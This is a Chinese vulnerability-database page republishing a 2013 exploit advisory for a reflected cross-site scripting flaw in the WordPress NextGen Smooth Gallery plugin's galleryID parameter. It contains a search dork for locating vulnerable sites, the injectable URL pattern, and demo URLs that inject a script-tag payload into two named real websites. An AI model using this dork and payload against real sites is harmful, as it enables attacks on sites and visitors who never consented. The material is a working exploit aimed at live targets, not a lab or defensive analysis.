WordPress NextGen Smooth Gallery Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044513 漏洞类型
发布时间 2013-09-04 更新时间 2013-09-04
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013090036
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
###################

#          Iranian Exploit DataBase Forum

#               http://iedb.ir/acc

#                 http://iedb.ir

###################

# Exploit Title : Wordpress nextgen-smooth-gallery Plugin Xss vulnerabilities

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : IeDb.Team@Gmail.com

# Home : http://iedb.ir   -   http://iedb.ir/acc

# Software Link : http://wordpress.org/

# Security Risk : High

# Tested on : Linux

# Dork : inurl:/plugins/nextgen-smooth-gallery/

###################

# Exploit :

# http://site.com/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=[Xss]

# Dem0 :

# http://www.thetailor.com.au/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=187"><script>alert(/IeDb.Ir/)</script>

# http://www.4castsecurity.com/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=2"><script>alert(/IeDb.Ir/)</script>

###################

# Tnx To : TaK.FaNaR - l4tr0d3ctism - r3d_s0urc3 - Bl4ck M4n - F??iD - Medrik - Dj.TiniVini - dr.koderz - z3r0 - Mr Zer0

# B3hz4d - C0dex -  Behnam Vanda - ErfanMs - E2MA3N - S!Y0U.T4r.6T - ??4?? ?3?? - 0x0ptim0us - ARTA

#                   & All Member In Iedb.ir/acc & Iranian Hackers

###################

# Exploit Archive = http://www.iedb.ir/exploits-484.html

###################